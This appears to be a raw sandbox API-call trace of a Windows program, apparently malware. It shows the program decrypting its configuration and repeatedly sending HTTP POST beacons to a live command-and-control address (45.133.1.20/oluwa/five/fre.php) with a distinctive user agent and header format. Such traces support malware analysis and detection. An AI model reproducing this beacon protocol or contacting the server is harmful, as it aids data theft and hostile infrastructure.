0x6a0000 [0213.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0213.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.131] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.140] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0213.153] GetProcessHeap () returned 0x6a0000 [0213.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0213.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.154] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0213.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.156] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.160] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.160] GetProcessHeap () returned 0x6a0000 [0213.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0213.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.162] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0213.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.163] CryptDestroyKey (hKey=0x6ad560) returned 1 [0213.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.164] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0213.165] GetProcessHeap () returned 0x6a0000 [0213.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0213.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.184] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.186] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.187] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.188] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.188] GetProcessHeap () returned 0x6a0000 [0213.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0213.188] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0213.189] GetProcessHeap () returned 0x6a0000 [0213.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0213.189] GetProcessHeap () returned 0x6a0000 [0213.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0213.192] GetProcessHeap () returned 0x6a0000 [0213.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0213.192] GetProcessHeap () returned 0x6a0000 [0213.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0213.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.193] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.200] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0213.290] GetProcessHeap () returned 0x6a0000 [0213.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0213.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.291] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0213.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.292] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.294] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.294] GetProcessHeap () returned 0x6a0000 [0213.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0213.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.296] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0213.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.297] CryptDestroyKey (hKey=0x6ad020) returned 1 [0213.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.298] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0213.298] GetProcessHeap () returned 0x6a0000 [0213.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0213.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.300] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0213.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.301] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0213.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.302] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0213.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.304] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0213.304] GetProcessHeap () returned 0x6a0000 [0213.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0213.304] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0213.304] GetProcessHeap () returned 0x6a0000 [0213.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0213.304] socket (af=2, type=1, protocol=6) returned 0x5f0 [0213.304] connect (s=0x5f0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0213.330] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0213.330] GetProcessHeap () returned 0x6a0000 [0213.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0213.330] GetProcessHeap () returned 0x6a0000 [0213.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4f18 [0213.331] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0213.332] wvsprintfA (in: param_1=0x6c4f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0213.332] GetProcessHeap () returned 0x6a0000 [0213.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0213.332] GetProcessHeap () returned 0x6a0000 [0213.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0213.332] GetProcessHeap () returned 0x6a0000 [0213.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0213.332] GetProcessHeap () returned 0x6a0000 [0213.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4f18 [0213.333] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0213.334] wvsprintfA (in: param_1=0x6c4f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0213.334] GetProcessHeap () returned 0x6a0000 [0213.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0213.334] GetProcessHeap () returned 0x6a0000 [0213.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0213.335] send (s=0x5f0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0213.336] send (s=0x5f0, buf=0x6bb998*, len=159, flags=0) returned 159 [0213.336] GetProcessHeap () returned 0x6a0000 [0213.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0213.336] recv (in: s=0x5f0, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0213.410] GetProcessHeap () returned 0x6a0000 [0213.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0213.411] GetProcessHeap () returned 0x6a0000 [0213.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0213.411] GetProcessHeap () returned 0x6a0000 [0213.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0213.411] GetProcessHeap () returned 0x6a0000 [0213.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0213.412] closesocket (s=0x5f0) returned 0 [0213.412] GetProcessHeap () returned 0x6a0000 [0213.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0213.412] GetProcessHeap () returned 0x6a0000 [0213.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0213.413] GetProcessHeap () returned 0x6a0000 [0213.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0213.413] GetProcessHeap () returned 0x6a0000 [0213.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0213.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xeb0) returned 0x5f0 [0213.416] Sleep (dwMilliseconds=0xea60) [0213.417] GetProcessHeap () returned 0x6a0000 [0213.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0213.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.419] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0213.470] GetProcessHeap () returned 0x6a0000 [0213.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0213.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.471] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0213.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.472] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.473] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.473] GetProcessHeap () returned 0x6a0000 [0213.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0213.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.474] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0213.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.475] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0213.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.476] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0213.476] GetProcessHeap () returned 0x6a0000 [0213.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0213.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.477] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.478] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.479] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.480] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.480] GetProcessHeap () returned 0x6a0000 [0213.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0213.480] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0213.480] GetProcessHeap () returned 0x6a0000 [0213.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0213.481] GetProcessHeap () returned 0x6a0000 [0213.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0213.481] GetProcessHeap () returned 0x6a0000 [0213.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0213.481] GetProcessHeap () returned 0x6a0000 [0213.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0213.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.482] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.487] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0213.494] GetProcessHeap () returned 0x6a0000 [0213.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0213.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.495] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0213.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.496] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.497] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.497] GetProcessHeap () returned 0x6a0000 [0213.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0213.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.499] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0213.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.500] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0213.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.501] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0213.501] GetProcessHeap () returned 0x6a0000 [0213.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0213.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.501] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0213.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.502] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0213.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.503] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0213.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0213.504] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0213.504] GetProcessHeap () returned 0x6a0000 [0213.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0213.504] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0213.504] GetProcessHeap () returned 0x6a0000 [0213.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0213.504] socket (af=2, type=1, protocol=6) returned 0x5f4 [0213.505] connect (s=0x5f4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0213.540] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0213.540] GetProcessHeap () returned 0x6a0000 [0213.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0213.540] GetProcessHeap () returned 0x6a0000 [0213.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4f18 [0213.541] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0213.542] wvsprintfA (in: param_1=0x6c4f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0213.542] GetProcessHeap () returned 0x6a0000 [0213.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0213.542] GetProcessHeap () returned 0x6a0000 [0213.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0213.542] GetProcessHeap () returned 0x6a0000 [0213.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0213.542] GetProcessHeap () returned 0x6a0000 [0213.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4f18 [0213.543] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0213.544] wvsprintfA (in: param_1=0x6c4f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0213.544] GetProcessHeap () returned 0x6a0000 [0213.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0213.544] GetProcessHeap () returned 0x6a0000 [0213.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0213.544] send (s=0x5f4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0213.545] send (s=0x5f4, buf=0x6bb998*, len=159, flags=0) returned 159 [0213.545] GetProcessHeap () returned 0x6a0000 [0213.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0213.545] recv (in: s=0x5f4, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0213.629] GetProcessHeap () returned 0x6a0000 [0213.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0213.629] GetProcessHeap () returned 0x6a0000 [0213.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0213.630] GetProcessHeap () returned 0x6a0000 [0213.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0213.630] GetProcessHeap () returned 0x6a0000 [0213.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0213.631] closesocket (s=0x5f4) returned 0 [0213.631] GetProcessHeap () returned 0x6a0000 [0213.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0213.631] GetProcessHeap () returned 0x6a0000 [0213.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0213.632] GetProcessHeap () returned 0x6a0000 [0213.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0213.632] GetProcessHeap () returned 0x6a0000 [0213.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0213.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xca4) returned 0x5f4 [0213.635] Sleep (dwMilliseconds=0xea60) [0213.636] GetProcessHeap () returned 0x6a0000 [0213.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0213.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.638] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.649] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0213.657] GetProcessHeap () returned 0x6a0000 [0213.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0213.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0213.658] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, 